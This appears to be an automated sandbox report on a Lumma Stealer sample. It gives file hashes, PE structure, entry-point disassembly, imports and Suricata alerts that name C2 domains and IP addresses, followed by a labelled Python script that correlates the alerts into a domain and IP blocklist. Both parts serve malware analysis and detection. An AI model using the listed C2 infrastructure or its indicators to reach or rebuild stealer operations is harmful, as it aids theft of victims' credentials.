SHA1:703D7B35F60B52B25B466E182C70D53AAD36A739
SHA-256:C78334E000B72B32079FEE1A9D82B32F11286EC6A2ED0A535718C7DB50E274E1
SHA-512:419BAAEBC512DFCA9F9307DDAE4DA6FEC29571D51E7EC70F5E203F5E0704641478681D9F3440055E1FD4E9B70965B585F2DF4B0F432F49CA15285A92BE2232E1
Malicious:true
Reputation:low
                                                                                                                                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.7.2.4.4.3.8.4.6.9.8.6.0.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.7.2.4.4.3.8.8.9.1.7.3.8.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.c.e.c.a.2.9.4.-.b.6.7.1.-.4.c.d.d.-.8.b.f.9.-.a.b.d.3.9.7.6.3.5.4.e.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.9.8.5.c.1.2.9.-.0.c.5.d.-.4.f.2.d.-.b.3.b.8.-.5.3.5.5.4.3.0.e.0.6.9.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.8.6.D.C...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.e.c.-.0.0.0.1.-.0.0.1.4.-.4.0.4.3.-.9.b.3.1.c.a.4.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.f.6.3.7.e.f.2.7.3.a.1.c.a.b.6.9.4.5.c.4.3.c.e.2.b.e.9.e.4.8.4.0.0.0.0.f.f.f.f.!.0.0.0.0.4.a.2.0.9.5.6.9.0.b.a.8.f.1.3.2.5.d.d.1.0.1.6.7.3.1.8.7.2.8.4.4.7.d.1.2.0.5.8.a.!.8.6.D.C...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 15 streams, Sun Dec 15 08:20:38 2024, 0x1205a4 type
Category:dropped
Size (bytes):46046
Entropy (8bit):2.5655370660130896
Encrypted:false
SSDEEP:192:17TXcaEuXYIfXOx1BEjD+A2XNvuZdTLL4uWIeBgMnSmH8vyb7:qaEuXY/TBEj/ycMYIgMSmH86n
MD5:3FD50D802E5A5942BBCE1DE804FD59DC
SHA1:8C4A5D4B3386C0930FC629FA346B1E9FC82471D7
SHA-256:D455B877BEE6E6F5378C1A5B30B8AFFEF3ACA543228ADC334B0A1D0492D59DE2
SHA-512:3A0ACB3E27F5AB533663ECC325D3846716B59590F4EC80BF795DDDA3859197AF6148DB014417A37F8CCF46EA0A7F8E437B0F52C50BB2B03C9FEB5AD757174F36
Malicious:false
Reputation:low
                                                                                                                                                                                                                                                                                    Preview:MDMP..a..... .......V.^g............4...............H...........<.......t....-..........`.......8...........T............@...s......................................................................................................eJ....... ......GenuineIntel............T...........J.^g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):8286
Entropy (8bit):3.6989328271515465
Encrypted:false
SSDEEP:192:R6l7wVeJ8E6fOI6YGv6fTgmf5MsppDG89b4/sf0/Im:R6lXJH6J6YW6bgmfzj4kf0V
MD5:CA4B3110759B9FA351A68F2006D35B4A
SHA1:F3DC499936945D6FE4F7D444D5435C75893FC58A
SHA-256:452B043E5ABE74CECA4B192B8E3FEFD9E2D6237977597A0D3DB2BC0BE5B45D47
SHA-512:645EC60A7DFAE13198CD4940C45F59214FC5DA72D09819DE4ED30D787A85E6CB2889DA91652B22F01135C42266A8A49F62584C2F27CA95D6E69BA9CD68A04D5F
Malicious:false
Reputation:low
Preview:<?xml version="1.0" encoding="UTF-16"?><WERReportMetadata><OSVersionInformation><WindowsNTVersion>10.0</WindowsNTVersion><Build>19045</Build><Product>(0x30): Windows 10 Pro</Product><Edition>Professional</Edition><BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString><Revision>2006</Revision><Flavor>Multiprocessor Free</Flavor><Architecture>X64</Architecture><LCID>2057</LCID></OSVersionInformation><ProcessInformation><Pid>5868</Pi
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4565
Entropy (8bit):4.451355962757731
Encrypted:false
SSDEEP:48:cvIwWl8zszJg77aI9kHWpW8VYGYm8M4Jb9WeFTI+q8sCCunxHzHAd:uIjfNI7a27VuJXI2nxHzHAd
MD5:1EA9817BDFB7A5A4754B4EF9AE5EF1F6
SHA1:5635B99595751D3BCCB833E90CDE3F010AE195C0
SHA-256:4D0E79633571ACC18FBDCD98F1CC7BCA4552CB848CE6A1D2DD47B5ABB41F4127
SHA-512:73CC56BB5362D2F9AE869C82D371B18D8DDF440C4D6589136D7E5A2A5BC7884F72331379AA6DDA1681977CA477D2AD48E7B60D0501B9CE52013DCBAB55B7CA31
Malicious:false
Reputation:low
Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="632123" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
Process:C:\Users\user\Desktop\AZCFTWko2q.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):361984
Entropy (8bit):6.633746849794654
Encrypted:false
SSDEEP:6144:alAD8SHVttaSqqwtsdu2S6Vfit5Ak+zDwHEjYWZuNCUS:alAZfqqwtuu2nivABAkMWm6
MD5:D88E2431ABAC06BDF0CD03C034B3E5E3
SHA1:4A2095690BA8F1325DD10167318728447D12058A
SHA-256:4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
SHA-512:7AA5317DCDF4343F1789E462F4B5D3D23F58E28B97C8C55FC4B3295BF0C26CFB5349B0A3543B05D6AF8FA2BC77F488A5ECE5EAACEAF5211FA98230EA9B7F49A7
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 62%
Joe Sandbox View:
• Filename: rHrG691f7q.exe, Detection: malicious, Browse
• Filename: TN78WX7nJU.exe, Detection: malicious, Browse
• Filename: XIaCqh1vRm.exe, Detection: malicious, Browse
• Filename: QQx0tdFC0b.exe, Detection: malicious, Browse
Reputation:low
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:MS Windows registry file, NT/2000 or above
Category:dropped
Size (bytes):1835008
Entropy (8bit):4.372090955571479
Encrypted:false
SSDEEP:6144:QFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNziL:IV1QyWWI/glMM6kF7xq
MD5:2ED8D36EFC21BE8F53E3D70F28492584
SHA1:F2A081D3C92F8A41EE6DBE1E05F0950632499D34
SHA-256:CBF043AF06CCFAE56A00A381C2742B14A140D0ECDE57908034EA88EF1272E1E4
SHA-512:472F4E8F6BB5C8802EC4FD54F80AEB2AAAD01CC4AFAF3FF84571ECEC8BF780EA9FA92696D67286F79E1C4DC66E409F0CF5397D327B29CB7D7967F3B99B83F389
Malicious:false
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.9956521780967105
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: AZCFTWko2q.exe
File size: 429'056 bytes
MD5: 7c13e0cbd1513abe7f2d2d73cc0ad615
SHA1: 375062b73661432e50e66cf08557ff3b737c8914
SHA256: 979cfe34baa41bc1556c9349402ced4242d6a7b3f0197d9e07643caa363daa93
SHA512: 5cb2656d377b821f48f22651ce1af1fb3fb8691b9abf664035b167541ff3ce9c4abe59d862bfdfa3f2165863a4444c4b701f9c3c3e1ecbb2cc64606b167eb771
SSDEEP: 6144:1V+A7dY8rh7851/SGh75bqrjQE5lmOYbD8mwdVZzaiKPVYfpU:1V+A7dGUGWQVrDudVciUQpU
TLSH: 7394E05076EDC832E2FB8A305D35D7942A3BF5A36A71928F36642A5F0E712D1C972703
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........S...S...S.....f.R...M.t.M...M.e.G...M.s.=...tj..Z...S... ...M.z.R...M.d.R...M.a.R...RichS...........PE..L...m.of...........
Icon Hash: 46c7c30b0f4e8d59
Entrypoint: 0x40185c
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x666FF66D [Mon Jun 17 08:40:13 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: 2e0d489727c83968a7eef10b14f239ec
Instruction
call 00007FCD88C62976h
jmp 00007FCD88C5EFFDh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00456C18h], eax
mov dword ptr [00456C14h], ecx
mov dword ptr [00456C10h], edx
mov dword ptr [00456C0Ch], ebx
mov dword ptr [00456C08h], esi
mov dword ptr [00456C04h], edi
mov word ptr [00456C30h], ss
mov word ptr [00456C24h], cs
mov word ptr [00456C00h], ds
mov word ptr [00456BFCh], es
mov word ptr [00456BF8h], fs
mov word ptr [00456BF4h], gs
pushfd
pop dword ptr [00456C28h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [00456C1Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00456C20h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [00456C2Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [00456B68h], 00010001h
mov eax, dword ptr [00456C20h]
mov dword ptr [00456B1Ch], eax
mov dword ptr [00456B10h], C0000409h
mov dword ptr [00456B14h], 00000001h
mov eax, dword ptr [00454004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00454008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000BCh]
Programming Language:
• [C++] VS2008 build 21022
• [ASM] VS2008 build 21022
• [ C ] VS2008 build 21022
• [IMP] VS2005 build 50727
• [RES] VS2008 build 21022
• [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x529cc | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x431000 | 0xf5c8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x52528 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x51000 | 0x188 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x4fcec | 0x4fe00 | d7b4f388686a04f4e1db9e5dd989e109 | False | 0.8437683392018779 | data | 7.54486526059017 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x51000 | 0x22ac | 0x2400 | 460d4ff88dad49b5a7b2cf269921cc36 | False | 0.3567708333333333 | data | 5.4011572557971395 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x54000 | 0x3dc49c | 0x7000 | 1d864f8258ab93d04bb8a110ce6f1f4f | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x431000 | 0xf5c8 | 0xf600 | 14791c198544a3fe070ceb9243afd022 | False | 0.5639132367886179 | data | 5.472691619863669 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x43c0c8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.31023454157782515
RT_ICON | 0x431610 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkmen | Turkmenistan | 0.5189232409381663
RT_ICON | 0x4324b8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkmen | Turkmenistan | 0.5717509025270758
RT_ICON | 0x432d60 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkmen | Turkmenistan | 0.6105990783410138
RT_ICON | 0x433428 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkmen | Turkmenistan | 0.6502890173410405
RT_ICON | 0x433990 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Turkmen | Turkmenistan | 0.42147302904564315
RT_ICON | 0x435f38 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Turkmen | Turkmenistan | 0.4910881801125704
RT_ICON | 0x436fe0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Turkmen | Turkmenistan | 0.48565573770491804
RT_ICON | 0x437968 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Turkmen | Turkmenistan | 0.5957446808510638
RT_ICON | 0x437e48 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkmen | Turkmenistan | 0.820362473347548
RT_ICON | 0x438cf0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkmen | Turkmenistan | 0.8569494584837545
RT_ICON | 0x439598 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkmen | Turkmenistan | 0.7966589861751152
RT_ICON | 0x439c60 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkmen | Turkmenistan | 0.8786127167630058
RT_ICON | 0x43a1c8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Turkmen | Turkmenistan | 0.8337242026266416
RT_ICON | 0x43b270 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Turkmen | Turkmenistan | 0.8454918032786886
RT_ICON | 0x43bbf8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Turkmen | Turkmenistan | 0.8643617021276596
RT_STRING | 0x43d140 | 0x4fe | data | | | 0.43661971830985913
RT_STRING | 0x43d640 | 0x66 | data | | | 0.6862745098039216
RT_STRING | 0x43d6a8 | 0x776 | data | | | 0.42670157068062825
RT_STRING | 0x43de20 | 0x54c | data | | | 0.4476401179941003
RT_STRING | 0x43e370 | 0x7e0 | data | | | 0.42162698412698413
RT_STRING | 0x43eb50 | 0x6da | data | | | 0.4298745724059293
RT_STRING | 0x43f230 | 0x756 | data | | | 0.422790202342918
RT_STRING | 0x43f988 | 0x63c | data | | | 0.43796992481203006
RT_STRING | 0x43ffc8 | 0x5fa | data | | | 0.43790849673202614
RT_GROUP_CURSOR | 0x43cf70 | 0x14 | data | | | 1.25
RT_GROUP_ICON | 0x43c060 | 0x68 | data | Turkmen | Turkmenistan | 0.7115384615384616
RT_GROUP_ICON | 0x437dd0 | 0x76 | data | Turkmen | Turkmenistan | 0.6610169491525424
RT_VERSION | 0x43cf88 | 0x1b4 | data | | | 0.5711009174311926
DLL | Import
KERNEL32.dll | SetDefaultCommConfigA, SetLocaleInfoA, GetNumaProcessorNode, InterlockedDecrement, SetComputerNameW, GetProcessPriorityBoost, GetModuleHandleW, GetEnvironmentStrings, LoadLibraryW, GetVersionExW, DeleteVolumeMountPointW, GetTimeFormatW, GetConsoleAliasW, GetFileAttributesW, GetStartupInfoA, SetLastError, GetProcAddress, UnregisterWait, BuildCommDCBW, ResetEvent, LoadLibraryA, Process32Next, LocalAlloc, GetFileType, AddAtomW, FoldStringW, GetModuleFileNameA, GetModuleHandleA, UpdateResourceW, WriteConsoleOutputAttribute, OpenFileMappingA, WriteProcessMemory, SetFileAttributesA, GetCommandLineW, CreateFileA, WriteConsoleW, GetLastError, HeapFree, MultiByteToWideChar, HeapAlloc, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, Sleep, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, HeapSize, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, ReadFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP
USER32.dll | GetProcessDefaultLayout
GDI32.dll | GetBitmapBits
Language of compilation system | Country where language is spoken
Turkmen | Turkmenistan
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-15T09:20:23.689288+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49705 | 104.21.56.70 | 443 | TCP
2024-12-15T09:20:25.258834+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49706 | 176.113.115.19 | 80 | TCP
2024-12-15T09:20:29.679458+0100 | 2058226 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) | 1 | 192.168.2.8 | 50583 | 1.1.1.1 | 53 | UDP
2024-12-15T09:20:29.821766+0100 | 2058222 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) | 1 | 192.168.2.8 | 50741 | 1.1.1.1 | 53 | UDP
2024-12-15T09:20:31.198097+0100 | 2058223 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) | 1 | 192.168.2.8 | 49707 | 172.67.207.38 | 443 | TCP
2024-12-15T09:20:31.198097+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49707 | 172.67.207.38 | 443 | TCP
2024-12-15T09:20:31.911159+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.8 | 49707 | 172.67.207.38 | 443 | TCP
2024-12-15T09:20:31.911159+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49707 | 172.67.207.38 | 443 | TCP
2024-12-15T09:20:31.916295+0100 | 2058214 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) | 1 | 192.168.2.8 | 52321 | 1.1.1.1 | 53 | UDP
2024-12-15T09:20:33.274722+0100 | 2058215 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) | 1 | 192.168.2.8 | 49708 | 104.21.16.1 | 443 | TCP
2024-12-15T09:20:33.274722+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49708 | 104.21.16.1 | 443 | TCP
2024-12-15T09:20:34.267261+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.8 | 49708 | 104.21.16.1 | 443 | TCP
2024-12-15T09:20:34.267261+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49708 | 104.21.16.1 | 443 | TCP
2024-12-15T09:20:34.296521+0100 | 2058220 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) | 1 | 192.168.2.8 | 54571 | 1.1.1.1 | 53 | UDP
2024-12-15T09:20:34.441300+0100 | 2058218 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) | 1 | 192.168.2.8 | 51869 | 1.1.1.1 | 53 | UDP
2024-12-15T09:20:34.582731+0100 | 2058216 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) | 1 | 192.168.2.8 | 56023 | 1.1.1.1 | 53 | UDP
2024-12-15T09:20:34.727477+0100 | 2058236 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) | 1 | 192.168.2.8 | 49571 | 1.1.1.1 | 53 | UDP
2024-12-15T09:20:34.868837+0100 | 2058210 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) | 1 | 192.168.2.8 | 50855 | 1.1.1.1 | 53 | UDP
2024-12-15T09:20:35.009441+0100 | 2058226 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) | 1 | 192.168.2.8 | 59245 | 1.1.1.1 | 53 | UDP
2024-12-15T09:20:36.684902+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49711 | 23.55.153.106 | 443 | TCP
2024-12-15T09:20:37.462041+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.8 | 49711 | 23.55.153.106 | 443 | TCP
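The alert table above shows the usual Lumma pattern: the sample walks a list of candidate C2 domains via DNS, but only two of them (immureprech .biz and deafeninggeh .biz) are followed by a TLS connection and a "CnC Host Checkin" on the same flow. The following is an added example, not part of the Joe Sandbox report or its tooling, that turns such a table into triaged indicators: it refangs the domains from the Suricata signature names, counts DNS lookups per domain, ties each "in TLS SNI" alert to the check-in alert that shares its (src IP, src port, dst IP, dst port) tuple, and only then treats the destination IP as a confirmed C2 address. The pipe-separated rendering of the table is constructed here for the example; the column order follows the report's header.

```python
from __future__ import annotations
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample input: a subset of the report's Suricata alert rows, one per line,
# as Timestamp|SID|Signature|Severity|Src IP|Src Port|Dst IP|Dst Port|Proto.
# Domains are defanged with a space before the TLD, exactly as the signatures print them.
SAMPLE_ALERTS = """\
2024-12-15T09:20:23.689288+0100|2803274|ETPRO MALWARE Common Downloader Header Pattern UH|2|192.168.2.8|49705|104.21.56.70|443|TCP
2024-12-15T09:20:29.679458+0100|2058226|ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)|1|192.168.2.8|50583|1.1.1.1|53|UDP
2024-12-15T09:20:29.821766+0100|2058222|ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)|1|192.168.2.8|50741|1.1.1.1|53|UDP
2024-12-15T09:20:31.198097+0100|2058223|ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)|1|192.168.2.8|49707|172.67.207.38|443|TCP
2024-12-15T09:20:31.911159+0100|2054653|ET MALWARE Lumma Stealer CnC Host Checkin|1|192.168.2.8|49707|172.67.207.38|443|TCP
2024-12-15T09:20:31.916295+0100|2058214|ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)|1|192.168.2.8|52321|1.1.1.1|53|UDP
2024-12-15T09:20:33.274722+0100|2058215|ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)|1|192.168.2.8|49708|104.21.16.1|443|TCP
2024-12-15T09:20:34.267261+0100|2054653|ET MALWARE Lumma Stealer CnC Host Checkin|1|192.168.2.8|49708|104.21.16.1|443|TCP
2024-12-15T09:20:34.296521+0100|2058220|ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)|1|192.168.2.8|54571|1.1.1.1|53|UDP
2024-12-15T09:20:34.441300+0100|2058218|ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)|1|192.168.2.8|51869|1.1.1.1|53|UDP
2024-12-15T09:20:34.582731+0100|2058216|ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)|1|192.168.2.8|56023|1.1.1.1|53|UDP
2024-12-15T09:20:34.727477+0100|2058236|ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)|1|192.168.2.8|49571|1.1.1.1|53|UDP
2024-12-15T09:20:34.868837+0100|2058210|ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)|1|192.168.2.8|50855|1.1.1.1|53|UDP
2024-12-15T09:20:35.009441+0100|2058226|ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)|1|192.168.2.8|59245|1.1.1.1|53|UDP
"""

# "(label .tld)" in DNS-lookup signatures, "(label .tld in TLS SNI)" in SNI signatures.
DEFANGED_DOMAIN = re.compile(r"\(([a-z0-9-]+) \.([a-z]+)(?: in TLS SNI)?\)")


@dataclass
class Indicator:
    domain: str
    first_seen: str
    queries: int = 0              # DNS lookups for this domain
    ip: Optional[str] = None      # server reached over TLS with this SNI, if any
    checkin: bool = False         # a CnC check-in alert fired on that same TCP flow


def parse_alert(line: str) -> dict:
    ts, sid, sig, sev, sip, sport, dip, dport, proto = line.split("|")
    return {"ts": ts, "sid": int(sid), "sig": sig, "sev": int(sev), "src": sip,
            "sport": int(sport), "dst": dip, "dport": int(dport), "proto": proto}


def refang(signature: str) -> Optional[str]:
    """Recover 'label.tld' from a defanged signature name, or None if it carries no domain."""
    m = DEFANGED_DOMAIN.search(signature)
    return f"{m.group(1)}.{m.group(2)}" if m else None


def correlate(alert_text: str) -> dict[str, Indicator]:
    """Build one Indicator per Lumma C2 domain, promoting it as evidence accumulates."""
    iocs: dict[str, Indicator] = {}
    flow_domain: dict[tuple, str] = {}   # (src, sport, dst, dport) -> domain seen in SNI
    for line in alert_text.splitlines():
        if not line.strip():
            continue
        a = parse_alert(line)
        if "Lumma" not in a["sig"]:
            continue   # generic hits (e.g. downloader header pattern) are not C2 evidence
        domain = refang(a["sig"])
        flow = (a["src"], a["sport"], a["dst"], a["dport"])
        if domain:
            ioc = iocs.setdefault(domain, Indicator(domain, a["ts"]))
            if "DNS Lookup" in a["sig"]:
                ioc.queries += 1
            elif "TLS SNI" in a["sig"]:
                ioc.ip = a["dst"]
                flow_domain[flow] = domain
        elif "CnC Host Checkin" in a["sig"] and flow in flow_domain:
            iocs[flow_domain[flow]].checkin = True
    return iocs


def blocklist(iocs: dict[str, Indicator]) -> list[str]:
    """All C2 domains, plus only those IPs on which a check-in was actually confirmed."""
    return sorted(iocs) + sorted(i.ip for i in iocs.values() if i.checkin and i.ip)


if __name__ == "__main__":
    for ioc in correlate(SAMPLE_ALERTS).values():
        state = "checkin" if ioc.checkin else ("contacted" if ioc.ip else "queried only")
        print(f"{ioc.domain:22} queries={ioc.queries} ip={ioc.ip} {state}")
```

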